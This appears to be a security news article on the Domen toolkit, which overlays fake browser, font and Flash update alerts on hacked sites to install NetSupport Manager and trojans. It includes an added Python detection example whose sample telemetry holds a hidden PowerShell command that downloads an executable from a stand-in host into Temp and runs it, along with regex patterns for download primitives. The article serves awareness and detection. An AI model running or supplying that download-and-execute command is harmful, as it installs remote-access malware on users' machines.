A new social engineering toolkit called Domen has been discovered that uses fake browser and program update alerts on compromised sites to infect users with malware and remote access software.
Attackers using fake browser and Flash Player update alerts to spread malware is nothing new, but this new toolkit, discovered by Malwarebytes researcher Jérôme Segura, has a high level of sophistication and customization that allows it to adapt to different clients, browsers, and visitors.
When loaded on a compromised site, the Domen toolkit will display a variety of alerts that overlay the site’s legitimate content. These fake alerts are designed to trick users into downloading the “update”, executing it, and infecting themselves with a payload of the attacker’s choice.
“Loaded as an iframe from compromised websites (most of them running WordPress) and displayed over top as an additional layer, it entices victims to install so-called updates that instead download the NetSupport remote administration tool,” Segura stated in his report. “In this blog we describe its tactics, techniques and procedures (TTPs) that remind us of some past and current social engineering campaigns.”
When someone accesses a hacked site that is using the Domen toolkit, the browser will open an iframe to another site, which in this particular attack is located at chrom-update.online. This iframe will include a large ~280 KB script called template.js that is loaded into the browser.
The template.js is the main file for the toolkit and includes all logic that determines what type of alert is going to be displayed, user agents that will be blocked, and the HTML and CSS used for the overlays. All images that are shown in the fake update overlays are hosted on imgur.com, which allows this script to be extremely portable.
For example, if the banner variable is set to 1, it will display a fake browser update alert.
If the banner value is set to 2, it will instead display a fake "PT Sans not found" alert that prompts you to download and install a browser “font pack”. This alert may look similar to the EITest Chrome HoeflerText Font Update alert, but Segura told BleepingComputer that the two are not related and this is just an imitation.
Finally, if the banner value is set to 3, it will display a fake Flash alert that prompts you to download and install an update for the program.
In addition to the variety of banners that can be displayed, Domen also supports 30 different languages and is designed for both desktop and mobile visitors. This allows the script to target a variety of different visitors that may visit a compromised site.
As this toolkit is contained in a single file, Segura feels that this makes Domen unique, since it allows individual attackers to customize it and create their own unique experience, including different payloads.
“What makes the Domen toolkit unique is that it offers the same fingerprinting (browser, language) and choice of templates thanks to a client-side (template.js) script which can be tweaked by each threat actor. Additionally, the breadth of possible customizations is quite impressive since it covers a range of browsers, desktop and mobile in about 30 different languages.”
While it is not known how many different sites are currently utilizing this toolkit, it is possible to track the number of visitors for the particular campaign discovered by Segura.
Segura noticed that one of the URLs contacted when the toolkit is used reports back the number of unique visitors who were shown one of the Domen alerts. At the time of this writing, BleepingComputer saw that the visitor count was over 111k.
If other bad actors are using this script for their own campaigns, this count could be much higher.
When a user downloads the update offered by these fake alerts, a file called download.hta will be downloaded.
When executed, the download.hta file will launch a PowerShell command that downloads a file from a remote site, saves it to %Temp%\jscheck.exe, and then executes it.
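The chain described above (an .hta run by mshta.exe spawning PowerShell that downloads an executable into %Temp% and runs it) is what an endpoint detection would key on. The following is an added example, not code from Segura's report or this article: a small detection check run over constructed, Sysmon-style process-creation events; the event fields, the example.invalid URL and the benign control event are assumptions.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Constructed process-creation record (simplified Sysmon-style fields)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Executable written to / launched from the user's Temp directory.
TEMP_EXE = re.compile(r"(%temp%\\?|\$env:temp\\|\\appdata\\local\\temp\\)[^\s\"]*\.exe", re.I)
# Common PowerShell download primitives.
DOWNLOAD = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient", re.I)


def find_fake_update_chains(events):
    """Return one hit per powershell.exe that (1) was spawned by mshta.exe, i.e. by an .hta,
    (2) downloads something and references an .exe under Temp, and report whether
    (3) a child process was then launched from Temp (the jscheck.exe stage)."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        if not e.image.lower().endswith("powershell.exe"):
            continue
        parent = by_pid.get(e.ppid)
        if parent is None or not parent.image.lower().endswith("mshta.exe"):
            continue
        if not (DOWNLOAD.search(e.cmdline) and TEMP_EXE.search(e.cmdline)):
            continue
        launched = any(c.ppid == e.pid and TEMP_EXE.search(c.image) for c in events)
        hits.append({"pid": e.pid, "hta_parent": parent.cmdline, "dropped_exe_launched": launched})
    return hits


# Constructed sample telemetry: one Domen-style chain plus a benign admin download.
SAMPLE_EVENTS = [
    ProcEvent(100, 1, r"C:\Program Files\Google\Chrome\Application\chrome.exe", "chrome.exe"),
    ProcEvent(200, 100, r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\Users\bob\Downloads\download.hta"),
    ProcEvent(300, 200, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell -w hidden -c (New-Object Net.WebClient).DownloadFile('http://example.invalid/x',"
              r"'$env:TEMP\jscheck.exe'); Start-Process $env:TEMP\jscheck.exe"),
    ProcEvent(400, 300, r"C:\Users\bob\AppData\Local\Temp\jscheck.exe", "jscheck.exe"),
    ProcEvent(500, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    ProcEvent(600, 500, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell Invoke-WebRequest https://example.invalid/tool.msi -OutFile $env:TEMP\tool.msi"),
]

if __name__ == "__main__":
    for hit in find_fake_update_chains(SAMPLE_EVENTS):
        print(hit)
```

Only the mshta-parented PowerShell that both downloads and touches an .exe in Temp is flagged; the explorer-launched download of an .msi is left alone.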
When executed, the NetSupport Manager program will be installed, which allows the attacker to remotely take over the infected computer. This includes taking screenshots, executing commands, and uploading and downloading files.
NetSupport Manager is a legitimate remote management software that is commonly installed by attackers to take control over a victim’s computer. Due to this, most security software should detect it in some manner if it is installed.
If you find that this process is running on your computer without your knowledge, then you should consider your computer and your login credentials compromised by an attacker.
Unfortunately, it is not only NetSupport Manager being installed using this toolkit!
Security researcher mol69 has found other campaigns utilizing the Domen toolkit that push the Amadey, Raccoon, and Predator the Thief Trojans.
Some of these campaigns are incorporating the template.js file into other JavaScript files used by the hacked sites in order to make it harder to detect.
With the number of campaigns currently being discovered that use this toolkit, we should expect to see its usage increase.